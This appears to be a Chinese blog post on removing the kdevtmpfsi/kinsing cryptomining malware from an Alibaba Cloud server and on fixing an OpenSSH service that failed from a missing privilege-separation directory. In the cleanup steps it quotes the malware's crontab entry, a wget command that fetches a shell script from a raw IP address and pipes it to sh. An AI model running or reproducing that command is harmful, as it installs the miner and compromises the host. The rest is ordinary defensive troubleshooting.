Linux【问题记录 04】SSH突然无法连接排查2个小时最终解决Failed to start OpenSSH server daemon及阿里云服务器的 kdevtmpfsi 挖矿病毒处理

简介: Linux【问题记录 04】SSH突然无法连接排查2个小时最终解决Failed to start OpenSSH server daemon及阿里云服务器的 kdevtmpfsi 挖矿病毒处理

1.说明

我有两台云服务器,一台阿里的(买了1年),一台腾讯的(买了3年),都是基本配置1核心2G内存(阿里云盘是40G腾讯的是50G),这几天一直收到阿里云的短信说出现了紧急安全事件:恶意脚本代码执行…

今天早上就登录了阿里云服务器查看了一下top,发现 kdevtmpfsi 的进程 cup 占用快100%了,中招的朋友不少,解决方法如下【一共5个步骤】腾讯官方也有相关的 处理方法

# 1.查看kdevtmpfsi的守护进程kinsing先kill掉【否则kdevtmpfsi进程会不断恢复占用】
[root@aliyun ~]# ps -aux | grep kinsing
# 2.查看kdevtmpfsi的进程并kill掉
[root@aliyun ~]# ps -aux | grep kdevtmpfsi 
# 3.删除/tmp/下kdevtmpfsi相关文件
[root@aliyun ~]# cd /tmp/
[root@aliyun tmp]# rm -rf kdevtmpfsi
# 4.删除/var/tmp/下kinsing相关文件
[root@aliyun ~]# cd /var/tmp/
[root@aliyun tmp]# rm -rf kinsing
# 5.查询并删除定时任务 
  # 查询
  [root@aliyun ~]# crontab -l
  * * * * * wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1
  # 编辑删除 删除全部定时任务 crontab -r
  [root@aliyun ~]# crontab -e

至此,阿里云的服务器问题解决,😢 谁知道,让我哭的是腾讯的云服务器。昨天我还在测试Hadoop,今天使用ssh客户端无法登录,我一想,会不会也是这个病毒…【可惜不是 😳】

2.SSH无法连接问题排查

我先是上控制台进行了实例的自助检测,发现今天上午【连接数出现过达到上限的情况】:

ping了一下服务器,通了…

又确认了一下安全组,没有问题啊…

进行了实例端口验通,也是没有问题…

然后使用腾讯云的控制台登录了服务器:

使用标准登录方式【TCP:22】自然是无法登录的,所以用的是VNC登录:

登录后发现hosts映射和hostname都已经被篡改了,随后查看了 top 没有发现异常,查看 crontab 也没有异常,然后就剩 SSH 服务了:

## 查看服务状态【处理时没有截图】这里复现一下,一直处在【activating(auto-restart)】
[root@VM-0-8-centos ~]# systemctl status sshd.service
● sshd.service - OpenSSH server daemon
   Loaded: loaded (/usr/lib/systemd/system/sshd.service; enabled; vendor preset: enabled)
   Active: activating(auto-restart) (Result: exit-code) since Fri 2021-08-20 13:38:56 CST; 7s ago
     Docs: man:sshd(8)
           man:sshd_config(5)
  Process: 31925 ExecStart=/usr/sbin/sshd -D $OPTIONS (code=exited, status=255)
 Main PID: 31925 (code=exited, status=255)
Aug 20 13:38:41 VM-0-8-centos systemd[1]: sshd.service: main process exited, code=exited, status=255/n/a
Aug 20 13:38:41 VM-0-8-centos systemd[1]: Failed to start OpenSSH server daemon.
Aug 20 13:38:41 VM-0-8-centos systemd[1]: Unit sshd.service entered failed state.
Aug 20 13:38:41 VM-0-8-centos systemd[1]: sshd.service failed.
Aug 20 13:38:56 VM-0-8-centos systemd[1]: Stopped OpenSSH server daemon.
# 查看报错原因
[root@VM-0-8-centos ~]# sshd -t
Missing privilege separation directory: /var/empty/sshd
# 创建文件夹 
[root@VM-0-8-centos ~]# mkdir -p /var/empty/sshd/etc
# 时区设置
[root@VM-0-8-centos ~]# cd /var/empty/sshd/etc/
[root@VM-0-8-centos etc]# ln -s /etc/localtime localtime
# 启动ssh服务
[root@VM-0-8-centos etc]# systemctl start sshd.service
# 再次查看状态
[root@VM-0-8-centos etc]# systemctl status sshd.service
● sshd.service - OpenSSH server daemon
   Loaded: loaded (/usr/lib/systemd/system/sshd.service; enabled; vendor preset: enabled)
   Active: active (running) since Fri 2021-08-20 13:48:24 CST; 4min 7s ago
     Docs: man:sshd(8)
           man:sshd_config(5)
 Main PID: 1015 (sshd)
   CGroup: /system.slice/sshd.service
           ├─1015 /usr/sbin/sshd -D
           ├─1742 sshd: unknown [priv]
           └─1743 sshd: unknown [net]

启动ssh服务成功,问题解决。

3.总结

😡 最终我也不知道为什么突然就无法访问,没有病毒木马,没有恶意连接。收获是:排查问题要从源头排查,刚开始没有想到是SSH服务的问题,一直以为是端口护着TCP无法连接。【给大家一个建议,经常修改服务器登录密码。】 👌

相关实践学习
2分钟自动化部署人生模拟器
本场景将带你借助云效流水线Flow实现人生模拟器小游戏的自动化部署
7天玩转云服务器
云服务器ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,可降低 IT 成本,提升运维效率。本课程手把手带你了解ECS、掌握基本操作、动手实操快照管理、镜像管理等。了解产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
10天前
|
监控 Ubuntu Linux
使用VSCode通过SSH远程登录阿里云Linux服务器异常崩溃
通过 VSCode 的 Remote - SSH 插件远程连接阿里云 Ubuntu 22 服务器时,会因高 CPU 使用率导致连接断开。经排查发现,VSCode 连接根目录 ".." 时会频繁调用"rg"(ripgrep)进行文件搜索,导致 CPU 负载过高。解决方法是将连接目录改为"root"(或其他具体的路径),避免不必要的文件检索,从而恢复正常连接。
|
1月前
|
网络安全 虚拟化 Docker
SSH后判断当前服务器是云主机、物理机、虚拟机、docker环境
结合上述方法,您可以对当前环境进行较为准确的判断。重要的是理解每种环境的特征,并通过系统的响应进行综合分析。如果在Docker容器内,通常会有明显的环境标志和受限的资源视图;而在云主机或虚拟机上,虽然它们也可能是虚拟化的,但通常提供更接近物理机的体验,且可通过硬件标识来识别虚拟化平台。物理机则直接反映硬件真实信息,较少有虚拟化痕迹。通过这些线索,您应该能够定位到您所处的环境类型。
27 2
|
1月前
|
弹性计算 安全 Linux
阿里云国际版使用ping命令测试ECS云服务器不通的排查方法
阿里云国际版使用ping命令测试ECS云服务器不通的排查方法
|
1月前
|
弹性计算 数据安全/隐私保护 Windows
阿里云国际版无法远程连接Windows服务器的排查方法
阿里云国际版无法远程连接Windows服务器的排查方法
|
1月前
|
域名解析 弹性计算 安全
无法ping通ECS服务器公网IP的排查方法
无法ping通ECS服务器公网IP的排查方法
|
1月前
|
网络安全
Ubuntu14.04安装ssh服务器
Ubuntu14.04安装ssh服务器
50 0
|
3月前
|
安全 Linux
在Linux中,发现⼀个病毒文件删了又自动创建如何解决?
在Linux中,发现⼀个病毒文件删了又自动创建如何解决?
|
3月前
|
监控 安全 Linux
在Linux中,系统中病毒怎么解决?
在Linux中,系统中病毒怎么解决?
|
3月前
|
安全 Linux 文件存储
在Linux中,服务器开不了机怎么解决⼀步步的排查?
在Linux中,服务器开不了机怎么解决⼀步步的排查?
|
3月前
|
网络安全
mac下通过ssh脚本实现免账号密码连接运服务器
mac下通过ssh脚本实现免账号密码连接运服务器
48 3